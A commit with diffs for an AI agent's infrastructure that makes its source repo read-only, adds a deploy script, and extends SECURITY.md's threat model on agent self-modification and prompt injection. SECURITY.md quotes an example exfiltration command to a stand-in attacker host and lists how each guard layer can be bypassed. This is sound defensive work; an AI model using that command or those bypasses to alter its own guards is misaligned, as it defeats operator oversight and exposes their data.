arch: separate infra source from agent runtime (read-only ~/hornet/)

Major architecture change: ~/hornet/ is now read-only to the agent.
The agent runs from deployed copies instead of the live source repo.

Changes:
- bin/deploy.sh: New script deploys extensions, skills, and bridge
  from source to runtime directories with correct permissions
- ~/.pi/agent/extensions/: Real directory (was symlink to source)
- ~/.pi/agent/skills/: Real directory (was symlink to source)
- ~/runtime/slack-bridge/: New runtime location for bridge process
- tool-guard.ts: Blocks ALL writes to ~/hornet/ (not just specific files),
  blocks chmod/chown/tee to source repo, protects runtime security files
- security-audit.sh: Replaces per-file ownership checks with:
  - Source repo writability check
  - Symlink-to-real-dir verification
  - Runtime integrity checks (sha256 vs source)
- setup.sh: Creates runtime dirs, runs deploy.sh, applies read-only
  permissions (bind mount + fallback chmod a-w)
- start.sh: Updated comments for new architecture
- SECURITY.md: Documents source/runtime separation model
- harden-permissions.sh: Covers runtime directory

Security model simplification:
  Before: 4-layer defense (file ownership, pre-commit hook, tool-guard, skill guidance)
          with fragile per-file ownership requiring careful admin workflow
  After:  Read-only source repo (single guarantee) + tool-guard + integrity checks
          Admin edits source freely, runs deploy.sh to push to runtime

Author: benvinegar

SECURITY.md

@@ -1,5 +1,31 @@
 # Security
 
+## Architecture: Source / Runtime Separation
+
+```
+~/hornet/                              ← READ-ONLY source repo (admin-managed)
+  ├── pi/extensions/                   ← source of truth for extensions
+  ├── pi/skills/                       ← source of truth for skill templates
+  ├── bin/                             ← admin scripts (deploy.sh, audit, firewall)
+  └── slack-bridge/                    ← source of truth for bridge
+
+~/.pi/agent/
+  ├── extensions/                      ← DEPLOYED copies (real dir, not symlink)
+  │   ├── tool-guard.ts               ← security-critical (deployed by admin)
+  │   ├── auto-name.ts                ← agent-modifiable
+  │   └── ...
+  └── skills/                          ← agent-owned (agent updates freely)
+
+~/runtime/
+  └── slack-bridge/                    ← DEPLOYED copy (bridge runs from here)
+      ├── bridge.mjs                   ← agent-modifiable
+      ├── security.mjs                 ← security-critical (deployed by admin)
+      └── node_modules/
+```
+
+The agent runs from deployed copies, never from the source repo directly.
+Admin edits source → runs `bin/deploy.sh` → copies to runtime with correct permissions.
+
 ## Trust Boundaries
 
 ```
@@ -20,7 +46,8 @@
 ┌─────────────────────────────────────────────────────────────────┐
 │               BOUNDARY 2: OS User Isolation                      │
 │   hornet_agent (uid 1001) — separate home, no sudo              │
-│   Cannot read admin home directory (admin home is 700)            │
+│   Cannot read admin home directory (admin home is 700)           │
+│   Source repo ~/hornet/ is read-only (permissions + tool-guard)  │
 │   Docker only via wrapper (blocks --privileged, host mounts)     │
 └──────────────────────────────┬──────────────────────────────────┘
                                │
@@ -33,6 +60,18 @@
 └─────────────────────────────────────────────────────────────────┘
 ```
 
+## Self-Modification Defense
+
+| Layer | What | Bypassed by |
+|-------|------|-------------|
+| **Read-only source** | ~/hornet/ has no write permissions for agent; bind mount (if applied via setup.sh) is kernel-enforced | Root access |
+| **Tool-guard rules** | Blocks write/edit to ~/hornet/ AND runtime security files; blocks chmod/chown on ~/hornet/ | None (compiled into extension) |
+| **Integrity checks** | security-audit.sh compares runtime file hashes against source | None (detection, not prevention) |
+| **Pre-commit hook** | Blocks git commit of protected files in source repo | --no-verify (root-owned hook) |
+
+The read-only source repo is the primary defense. Even if the agent modifies runtime copies,
+the admin can re-deploy from the untampered source at any time.
+
 ## User Model
 
 | User | Role | Sudo | Groups |
@@ -73,25 +112,40 @@ Slack @mention
 | `SLACK_BOT_TOKEN` | Bridge `.env` | `600` | Slack bot OAuth token |
 | `SLACK_APP_TOKEN` | Bridge `.env` | `600` | Slack Socket Mode token |
 
+## Deploy Workflow
+
+```bash
+# Admin edits source files in ~/hornet/
+# Then deploys to runtime:
+sudo ~/hornet/bin/deploy.sh
+
+# If bridge is running, restart it:
+sudo -u hornet_agent bash -c 'cd ~/runtime/slack-bridge && node bridge.mjs'
+```
+
 ## Known Risks
 
 ### Agent has unrestricted shell
-Within its own user permissions, `hornet_agent` can run any command. There is no tool policy layer, command allowlist, or exec approval system. A prompt injection that bypasses the content wrapping could instruct the agent to run arbitrary commands as `hornet_agent`.
+Within its own user permissions, `hornet_agent` can run any command. The tool-guard and safe-bash wrapper block known-dangerous patterns, but a prompt injection could attempt novel commands.
+
+### Agent can modify its own runtime files
+The deployed copies of non-security files (bridge.mjs, skills, most extensions) are agent-writable by design. The agent could modify these. Security-critical files (tool-guard.ts, security.mjs) are write-protected at the filesystem level and monitored via integrity checks.
 
 ### Agent has internet access
-Even with port-based firewall rules, the agent can reach any host over HTTPS. Data exfiltration via `curl https://attacker.com?data=...` is possible. The firewall blocks reverse shells and non-standard ports but does not prevent HTTPS exfil.
+Even with port-based firewall rules, the agent can reach any host over HTTPS. Data exfiltration via `curl https://attacker.com?data=...` is possible.
 
 ### Content wrapping is a soft defense
-The `<<<EXTERNAL_UNTRUSTED_CONTENT>>>` boundaries and security notice ask the LLM to ignore injected instructions. This raises the bar but is not a hard security boundary — sufficiently clever injections may still succeed.
+The `<<<EXTERNAL_UNTRUSTED_CONTENT>>>` boundaries and security notice ask the LLM to ignore injected instructions. This raises the bar but is not a hard security boundary.
 
 ### Session logs contain full history
-Pi session logs (`.jsonl` files) contain the complete conversation history including tool calls, file contents, and command outputs. If permissions are not hardened (see `bin/harden-permissions.sh`), these are group-readable.
+Pi session logs (`.jsonl` files) contain the complete conversation history. If permissions are not hardened (see `bin/harden-permissions.sh`), these are group-readable.
 
 ## Security Scripts
 
 | Script | Purpose | Run as |
 |--------|---------|--------|
-| `bin/security-audit.sh` | Check current security posture | hornet_agent or admin |
+| `bin/security-audit.sh` | Check current security posture + integrity checks | hornet_agent or admin |
+| `bin/deploy.sh` | Deploy from source to runtime with correct permissions | root or admin |
 | `bin/harden-permissions.sh` | Lock down pi state file permissions | hornet_agent |
 | `bin/setup-firewall.sh` | Apply port-based network restrictions | root |
 

bin/deploy.sh

@@ -0,0 +1,187 @@
+#!/bin/bash
+# Deploy extensions and bridge from hornet source to agent runtime.
+#
+# Run as root (or bentlegen with sudo) after any admin change to ~/hornet/.
+# This copies files from the read-only source repo to their runtime locations,
+# setting appropriate ownership:
+#   - Security-critical files → root:hornet_agent 644 (agent can read, not write)
+#   - Agent-modifiable files → hornet_agent:hornet_agent 664
+#
+# Usage:
+#   sudo ~/hornet/bin/deploy.sh           # deploy all
+#   sudo ~/hornet/bin/deploy.sh --dry-run # show what would change
+#
+# After deploy, restart the bridge if it's running:
+#   sudo -u hornet_agent bash -c 'tmux send-keys -t bridge C-c; sleep 1; tmux send-keys -t bridge "cd ~/runtime/slack-bridge && node bridge.mjs" Enter'
+
+set -euo pipefail
+
+HORNET_SRC="/home/hornet_agent/hornet"
+AGENT_HOME="/home/hornet_agent"
+DRY_RUN=0
+
+for arg in "$@"; do
+  case "$arg" in
+    --dry-run) DRY_RUN=1 ;;
+  esac
+done
+
+log() { echo "  $1"; }
+
+deploy_file() {
+  local src="$1"
+  local dest="$2"
+  local owner="$3"
+  local mode="$4"
+
+  if [ "$DRY_RUN" -eq 1 ]; then
+    log "would copy: $src → $dest ($owner, $mode)"
+    return
+  fi
+  cp -a "$src" "$dest"
+  chown "$owner" "$dest"
+  chmod "$mode" "$dest"
+  log "✓ $(basename "$dest") ($owner, $mode)"
+}
+
+# ── Extensions ───────────────────────────────────────────────────────────────
+
+echo "Deploying extensions..."
+
+# Security-critical extensions — root-owned, agent can read but not write
+PROTECTED_EXTENSIONS=(
+  "tool-guard.ts"
+  "tool-guard.test.mjs"
+)
+
+# Agent-modifiable extensions — hornet_agent-owned
+AGENT_EXTENSIONS=(
+  "auto-name.ts"
+  "zen-provider.ts"
+  "sentry-monitor.ts"
+)
+
+EXT_SRC="$HORNET_SRC/pi/extensions"
+EXT_DEST="$AGENT_HOME/.pi/agent/extensions"
+
+if [ "$DRY_RUN" -eq 0 ]; then
+  mkdir -p "$EXT_DEST"
+fi
+
+# Deploy all extension files and subdirectories
+for ext in "$EXT_SRC"/*; do
+  base=$(basename "$ext")
+
+  # Skip node_modules — those are built in-place
+  [ "$base" = "node_modules" ] && continue
+
+  if [ -d "$ext" ]; then
+    # Extension subdirectory (agentmail, kernel, email-monitor)
+    if [ "$DRY_RUN" -eq 0 ]; then
+      rsync -a --delete "$ext/" "$EXT_DEST/$base/"
+      chown -R hornet_agent:hornet_agent "$EXT_DEST/$base/"
+      log "✓ $base/ (hornet_agent:hornet_agent)"
+    else
+      log "would rsync: $ext/ → $EXT_DEST/$base/ (hornet_agent:hornet_agent)"
+    fi
+    continue
+  fi
+
+  # Check if this is a protected extension
+  is_protected=0
+  for pf in "${PROTECTED_EXTENSIONS[@]}"; do
+    if [ "$base" = "$pf" ]; then
+      is_protected=1
+      break
+    fi
+  done
+
+  if [ "$is_protected" -eq 1 ]; then
+    deploy_file "$ext" "$EXT_DEST/$base" "root:hornet_agent" "644"
+  else
+    deploy_file "$ext" "$EXT_DEST/$base" "hornet_agent:hornet_agent" "664"
+  fi
+done
+
+# ── Skills ───────────────────────────────────────────────────────────────────
+
+echo "Deploying skills..."
+
+SKILLS_SRC="$HORNET_SRC/pi/skills"
+SKILLS_DEST="$AGENT_HOME/.pi/agent/skills"
+
+if [ "$DRY_RUN" -eq 0 ]; then
+  mkdir -p "$SKILLS_DEST"
+  rsync -a "$SKILLS_SRC/" "$SKILLS_DEST/"
+  chown -R hornet_agent:hornet_agent "$SKILLS_DEST/"
+  log "✓ skills/ (hornet_agent:hornet_agent)"
+else
+  log "would rsync: $SKILLS_SRC/ → $SKILLS_DEST/ (hornet_agent:hornet_agent)"
+fi
+
+# ── Slack Bridge ─────────────────────────────────────────────────────────────
+
+echo "Deploying slack-bridge runtime..."
+
+BRIDGE_SRC="$HORNET_SRC/slack-bridge"
+BRIDGE_DEST="$AGENT_HOME/runtime/slack-bridge"
+
+if [ "$DRY_RUN" -eq 0 ]; then
+  mkdir -p "$BRIDGE_DEST"
+  rsync -a "$BRIDGE_SRC/" "$BRIDGE_DEST/"
+
+  # Security module — root-owned, agent cannot modify
+  chown root:hornet_agent "$BRIDGE_DEST/security.mjs"
+  chmod 644 "$BRIDGE_DEST/security.mjs"
+  log "✓ security.mjs (root:hornet_agent, 644)"
+
+  # Security tests — root-owned
+  if [ -f "$BRIDGE_DEST/security.test.mjs" ]; then
+    chown root:hornet_agent "$BRIDGE_DEST/security.test.mjs"
+    chmod 644 "$BRIDGE_DEST/security.test.mjs"
+    log "✓ security.test.mjs (root:hornet_agent, 644)"
+  fi
+
+  # Bridge logic — agent-modifiable
+  chown hornet_agent:hornet_agent "$BRIDGE_DEST/bridge.mjs"
+  chmod 664 "$BRIDGE_DEST/bridge.mjs"
+  log "✓ bridge.mjs (hornet_agent:hornet_agent, 664)"
+
+  # Package files and node_modules — agent-owned
+  chown -R hornet_agent:hornet_agent "$BRIDGE_DEST/node_modules" 2>/dev/null || true
+  for pf in package.json package-lock.json; do
+    [ -f "$BRIDGE_DEST/$pf" ] && chown hornet_agent:hornet_agent "$BRIDGE_DEST/$pf"
+  done
+  log "✓ node_modules/ + package files (hornet_agent:hornet_agent)"
+else
+  log "would rsync: $BRIDGE_SRC/ → $BRIDGE_DEST/"
+  log "would set security.mjs → root:hornet_agent 644"
+  log "would set bridge.mjs → hornet_agent:hornet_agent 664"
+fi
+
+# ── Settings ─────────────────────────────────────────────────────────────────
+
+echo "Deploying settings..."
+
+if [ -f "$HORNET_SRC/pi/settings.json" ]; then
+  if [ "$DRY_RUN" -eq 0 ]; then
+    cp "$HORNET_SRC/pi/settings.json" "$AGENT_HOME/.pi/agent/settings.json"
+    chown hornet_agent:hornet_agent "$AGENT_HOME/.pi/agent/settings.json"
+    chmod 600 "$AGENT_HOME/.pi/agent/settings.json"
+    log "✓ settings.json (hornet_agent:hornet_agent, 600)"
+  else
+    log "would copy settings.json"
+  fi
+fi
+
+# ── Summary ──────────────────────────────────────────────────────────────────
+
+echo ""
+if [ "$DRY_RUN" -eq 1 ]; then
+  echo "🔍 Dry run complete — no changes made."
+else
+  echo "✅ Deploy complete."
+  echo ""
+  echo "If the slack bridge is running, restart it:"
+  echo "  sudo -u hornet_agent bash -c 'cd ~/runtime/slack-bridge && node bridge.mjs'"
+fi

bin/harden-permissions.sh

@@ -65,6 +65,9 @@ fix_file "$HOME/.config/.env" "600"
 fix_dir "$HOME/.ssh" "700"
 find "$HOME/.ssh" -name 'id_*' -not -name '*.pub' -exec chmod 600 {} + 2>/dev/null
 
+# Runtime directories
+fix_dir "$HOME/runtime" "750"
+
 if [ "$changed" -eq 0 ]; then
   echo "  ✓ All permissions already correct"
 fi